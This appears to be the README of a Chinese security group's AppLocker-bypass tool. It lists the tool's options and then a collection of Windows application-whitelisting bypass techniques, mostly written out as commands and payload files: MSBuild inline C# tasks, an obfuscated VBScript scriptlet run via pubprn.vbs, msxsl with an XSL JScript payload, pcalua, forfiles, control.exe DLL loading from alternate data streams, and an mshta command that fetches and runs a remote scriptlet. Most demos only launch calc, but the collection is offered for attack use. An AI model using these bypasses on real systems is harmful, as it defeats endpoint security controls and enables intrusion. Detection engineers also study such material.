- 不合理使用此脚本所提供的功能而造成的任何直接或者间接的后果及损失, 均由使用者本人负责,即刻安全以及创作者不为此承担任何责任。
Any direct or indirect consequences and losses arising from the abuse of the featuress provided by those scripts are due to the user himself, secist and the author does not accept any responsibility.
C:\Users\demon>Secist_Attack.exe -h
-c, --csc: <path> Example: Secist_Attack.exe -c |or --csc C:\Users\demon\secist.cs |and run secist.exe
-C, --cscript: <path> Example: Secist_Attack.exe -C |or --cscript C:\Users\demon\Payload\secist.txt
-m, --msbuild: <path> Example: Secist_Attack.exe -m |or --msbuild C:\Users\demon\Payload\secist.csproj
-i, --cl_invocation: <Command> Example: Secist_Attack.exe -i |or --cl_invocation calc.exe
Secist_Attack.exe -i "powershell.exe calc"
-p, --pcalua: <APP> Example: Secist_Attack.exe -p |or --pcalua calc.exe
-l, --control: <DLL> Example: Secist_Attack.exe -l |or --control C:\Users\demon\example\runcalc.dll
-A, --Applocker: <shell> Example: Secist_Attack.exe -A |or --Applocker
-h, --help: <help> Example: Secist_Attack.exe -h |or --help <show help>
Who am I?
Hi there, I'm Demon. I have an interest in technology, both development of applications as well as systems administrations -- focussing mostly on Linux and everything open source.
About my team
secist(http://www.secist.com) is a volunteer group focused on promoting writers and their writing in a professional way, across different social media platforms for free.We provide a platform for those with a story to tell, knowledge to share, or an experience that we can all learn from.
If you are a new or emerging writer, work with us to raise your profile, polish your articles and present your work in the best possible light.
I will always remember something my father told me, “you have to help enough other people get what they want first, before you can get what you want out of life”.
Join us! Support secist in championing the work of others.
Contact
I'm best contacted through e-mail, at [email protected] welcome you to join our discussion group through QQ,account number 307283889.
You can ask me technological questions, but please don't be mad if I don't reply: I tend get a lot of e-mail. I do my best to respond to all of them -- but that doesn't always work. If I don't respond in time, feel free to send a reminder.
http://www.ggsec.cn/secist-Apploacker-bypass.html
c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Output\secist.exe Output\secist.cs && Output\secist.exe
using System;
namespace HelloWorld
{
class Program
{
static void Main(string[] args)
{
System.Diagnostics.Process.Start("calc.exe");
}
}
}
Links: http://www.ggsec.cn/NET-CS-calc.html
https://github.com/milkdevil/UltimateAppLockerByPassList
cscript C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs localhost "script:" 绝对路径\demon.png
<scriptlet>
<script language="VBScript.Encode">
#@~^NAAAAA==O�/O,',ZD�lDnr(LnmD`E UmDb2Yc?t�ssJ*R"EU`E^mV^R�a+r#ahEAAA==^#~@
</script>
</scriptlet>
Links: https://twitter.com/enigma0x3/status/923311244358094848
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe secist.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" />
<!-- Your PowerShell Path May vary -->
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Reflection;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
System.Diagnostics.Process.Start("calc");
return true;
}
}
public class powaShell
{
public static string RunPSCommand()
{
InitialSessionState iss = InitialSessionState.CreateDefault();
iss.LanguageMode = PSLanguageMode.FullLanguage;
Runspace runspace = RunspaceFactory.CreateRunspace(iss);
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
Console.WriteLine(System.Management.Automation.Security.SystemPolicy.GetSystemLockdownPolicy());
pipeline.Commands.AddScript("[Math]::Sqrt(9)");
//Prep PS for string output and invoke
pipeline.Commands.Add("Out-String");
Collection<PSObject> results = pipeline.Invoke();
runspace.Close();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
https://github.com/re4lity/subTee-gits-backups
"powershell.exe Get-AuthenticodeSignature C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1;. C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1;SyncInvoke calc.exe
Link: https://twitter.com/bohops/status/948061991012327424
forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe
Link:
https://twitter.com/Evi1cg/status/935027922397573120
mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct\").Exec();close();"
Link:
https://twitter.com/subTee/status/953990877264994304
c:\Windows\System32\pcalua.exe -a calc.exe
Link:
https://twitter.com/KyleHanslovan/status/912659279806640128
"C:\Program Files (x86)\MSBuild\14.0\Bin\csi.exe\" secist.csx
using System;System.Diagnostics.Process.Start("calc.exe");
Link:
https://github.com/milkdevil/UltimateAppLockerByPassList
Code
msxsl.exe customers.xml script.xsl
customers.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /k C:\\PSShell.exe");
return nodelist.nextNode().xml;
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>
Link:
https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
https://evi1cg.me/archives/AppLocker_Bypass_MSXSL.html
Tracker.exe /d runcalc.dll /c cmd
link
https://twitter.com/Sudhanshu_C/status/943011972261412864
https://twitter.com/subTee/status/793151392185589760
control .\example\runcalc.dll
type .\example\runcalc.dll > .\example\demon:secist.dll
control .\example\demon:secist.dll
LINK: https://twitter.com/bohops/status/954466315913310209
https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
LINK: https://github.com/milkdevil/UltimateAppLockerByPassList
-
即刻安全(Secist Sec)
+即刻安全纯技术交流群:307283889